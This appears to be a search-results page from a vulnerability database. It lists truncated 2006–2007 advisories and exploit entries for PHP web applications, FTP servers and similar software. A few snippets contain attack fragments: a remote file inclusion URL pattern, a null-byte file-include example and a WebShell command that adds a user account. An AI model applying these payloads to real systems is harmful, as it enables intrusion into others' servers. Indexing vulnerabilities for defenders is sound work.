1414 matches found

Packet Storm
added 2007/02/24 12:0 a.m. | 19 views

fcring-rfi.txt

FCRing 1.3 Webringskript Found by kezzap66345 Script: http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3 ERROR: if$sfuss != "" include$sfuss; rfi coded RFI: http://SITE.com/path/fcring.php?sfuss=SHELL kezzap66345athotmaildotcom thanx=x0r0nstr0keshika...

Exploits: 0

exploitpack
added 2007/02/09 12:0 a.m. | 10 views

eXtreme File Hosting - Arbitrary .RAR File Upload

eXtreme File Hosting - Arbitrary .RAR File Upload source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and...

AI score: 0.1
Exploits: 0

Exploit DB
added 2007/02/09 12:0 a.m. | 24 views

eXtreme File Hosting - Arbitrary '.RAR' File Upload

source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue could allow an attacker to upload and execute arbitrary PHP script code in the context ...

AI score: 7.4
Exploits: 0

Cvelist
added 2007/02/07 11:0 a.m. | 21 views

CVE-2007-0808

PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...

AI score: 7.6 | EPSS: 0.01348
Exploits: 0 | References: 3

securityvulns
added 2007/02/01 12:0 a.m. | 60 views

Michelle's L2J Dropcalc

Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...

AI score: 7.9
Exploits: 0

exploitpack
added 2007/01/31 12:0 a.m. | 15 views

Michelles L2J Dropcalc 4 - SQL Injection

Michelles L2J Dropcalc 4 - SQL Injection Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] ...

AI score: 0.4
Exploits: 0

Exploit DB
added 2007/01/31 12:0 a.m. | 42 views

Michelles L2J Dropcalc 4 - SQL Injection

Title: Michelle's L2J Dropcalc Version: = v4 Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm Discovered By: Codebreak [email protected] | www.codebreak.tk...

AI score: 7.4
Exploits: 0

Tenable Nessus
added 2007/01/19 12:0 a.m. | 24 views

Oreon lang/index.php file Parameter Remote File Inclusion

The remote host is running Oreon, a web-based network supervision program based on Nagios. The installation of Oreon on the remote host fails to sanitize input to the 'file' parameter of the 'lang/index.php' script before using it to include PHP code. Regardless of PHP's 'register_globals' setting...

CVSS: 7.5 | AI score: 6.2 | EPSS: 0.03279
Exploits: 0 | References: 1

Tenable Nessus
added 2007/01/18 12:0 a.m. | 36 views

WoltLab Burning Board search.php Multiple Parameter SQL Injection

The version of Burning Board / Burning Board Lite on the remote host fails to sanitize user input to the 'boardids' parameter of the 'search.php' script before using it in database queries. Regardless of PHP's 'register_globals' and 'magic_quotes_gpc' settings, an unauthenticated, remote attacker ca...

CVSS: 7.5 | AI score: 5.6 | EPSS: 0.01037
Exploits: 0 | References: 1

securityvulns
added 2007/01/17 12:0 a.m. | 43 views

Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

Actually, this can be pretty serious depending on server settings, but an improper example was given. Better one: jaxpetitionbook.php?languagepack=../../someotherallowedfileuploads/myfile.php.gif00 Many servers will have magic quotes on to defeat the null byte, but by no means all. John...

AI score: 1.1
Exploits: 0

Exploit DB
added 2007/01/11 12:0 a.m. | 34 views

Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion

Script: Article System Affected Version: 1.0 Download: http://kent.dl.sourceforge.net/sourceforge/artsys/artsys-0.1-20020705.tar.gz Author: Dr Max Virus Bug in: /path/include Vul Code; require_once "$INCLUDE_DIR/classes/class.formitem.php"; POC:...

AI score: 7.4
Exploits: 0

CVE
added 2007/01/05 11:0 a.m. | 48 views

CVE-2007-0082

This entry covers CVE-2007-0082 affecting IMGallery 2.5 and earlier. The vulnerability occurs in users_adm/start1.php where files with multiple extensions are not properly handled, allowing remote authenticated users to upload and execute arbitrary PHP scripts. The documented impact is partial co...

CVSS: 6.5 | AI score: 7.1 | EPSS: 0.01983
Exploits: 1 | References: 4 | Affected Software: 1

securityvulns
added 2007/01/03 12:0 a.m. | 37 views

Nuked Klan <= 1.7 Remote Cookie Disclosure Exploit

Nuked Klan <= 1.7 Remote Cookie Disclosure Exploit - Vendor : www.nuked-klan.org/ - Found by NeoSSJ & Kad' - Full disclosure on 31 December 2006 - Notice : you only have to create a .swf file, and you put on :...

AI score: 0.4
Exploits: 0

Exploit DB
added 2006/12/28 12:0 a.m. | 43 views

WebText 0.4.5.2 - Remote Code Execution

DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ Contact: [email protected] cod3d by Kacper ...

AI score: 7.4
Exploits: 0

Tenable Nessus
added 2006/12/21 12:0 a.m. | 46 views

TYPO3 'spell-check-logic.php' 'userUid' Parameter Arbitrary Command Execution

The remote host is running TYPO3, an open source content management system written in PHP. The version of TYPO3 installed on the remote host fails to sanitize user-supplied input to the 'userUid' parameter before using it in the 'spell-check-logic.php' script to execute a command. An...

CVSS: 7.5 | AI score: 6 | EPSS: 0.05977
Exploits: 1 | References: 3

myhack58
added 2006/12/20 12:0 a.m. | 13 views

Serv-U steal the administrator password novice section-Vulnerability warning-the black bar safety net

Sometimes, after getting a WebShell, we are very pleased to use the Serv-U local privilege escalation vulnerability to achieve complete control of the compromised host, but it will always go wrong. The command we input at the WebShell is generally like this: D:\WEB\su.exe “net user 1 1 /add” Many cases can not be...

AI score: 7.4
Exploits: 0

seebug.org
added 2006/12/13 12:0 a.m. | 18 views

Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service

No description provided by source. ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about "STOR" Denial of service, see:...

AI score: 7.1
Exploits: 0

exploitpack
added 2006/12/11 12:0 a.m. | 8 views

FileZilla FTP Server 0.9.21 - LISTNLST Denial of Service

FileZilla FTP Server 0.9.21 - LISTNLST Denial of Service ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about "STOR" Denial o...

AI score: 7.3
Exploits: 0

Tenable Nessus
added 2006/12/07 12:0 a.m. | 41 views

ThinClientServer Admin Account Creation Privilege Escalation

The remote host is running ThinClientServer, an application to convert existing PCs into thin clients. The version of ThinClientServer installed on the remote host allows an unauthenticated, remote attacker to create administrative accounts.

CVSS: 7.5 | AI score: 5.5 | EPSS: 0.017
Exploits: 0 | References: 3

CVE
added 2006/12/04 11:0 a.m. | 54 views

CVE-2006-6255

The CVE-2006-6255 entry concerns the NukeAI 0.0.3 Beta module for PHP-Nuke, where a vulnerability in util.php allows remote code execution. An attacker can upload and execute arbitrary PHP code by supplying a filename with a .php extension in the filename parameter and code in the moreinfo parame...

CVSS: 7.5 | AI score: 8.1 | EPSS: 0.02234
Exploits: 1 | References: 3 | Affected Software: 1